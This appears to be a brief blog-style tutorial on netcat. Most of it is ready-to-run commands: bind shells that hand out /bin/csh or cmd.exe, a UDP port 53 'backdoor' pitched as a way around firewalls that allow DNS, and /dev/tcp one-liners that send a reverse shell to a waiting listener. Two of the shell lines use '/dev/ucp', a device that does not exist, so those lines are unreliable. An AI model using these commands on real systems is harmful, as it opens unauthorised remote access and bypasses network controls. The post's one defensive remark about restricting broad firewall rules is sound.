- Faster than a speeding Telnet.
- Easy to drop with a CTRL-C
- Handles raw data in a single bound
Yes it not a bird or a plane, it is netcat.
Netcat is far faster than Telnet without the overhead and translation. This makes it superior for forensic data transfers. Unlike Telnet, netcat does not add characters.
Next, Netcat can connect over UDP. This means it can be used as a simple "Telnet" client and server - even over UDP.
On the Server:
# nc -l -p [port] -e /bin/csh
C:\ nc -l -p [port] -e C:\windows\cmd.exe
So if the aim is to have a UDP "telnet" style client over UDP 53, just run:
# nc -l -u -p 53 -e /bin/csh
Can we say a simple backdoor.
On the Client:
# nc [ServerIPAddress] [port]
So to connect to the listener above on UDP 53 at IP address 192.168.10.123 we would use:
# nc -u 192.168.10.123 53
It is all really easy when you think about it. This is why it is SO EASY to bypass firewalls and routers that allow DNS traffic (or any default rules). This is why it is CRITICAL that there are restrictions on all rules that have ANY system to ANY system access.
Opps - I forgot to install netcat...
More on this later, but for our netcat client on a system when we can not install netcat, there is both /dev/TCP and /dev/UDP
So for our UDP 53 example this becomes:
For the shell this becomes:
- /bin/csh –i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
- /bin/csh –i > /dev/ucp/[IPaddress]/[port] 0<&1 2>&1
- /bin/csh –i > /dev/ucp/192.168.10.123/53 0<&1 2>&1
Shovels a shell from the target host to waiting Netcat listener. We can enter commands on the host that act as a reverse shell.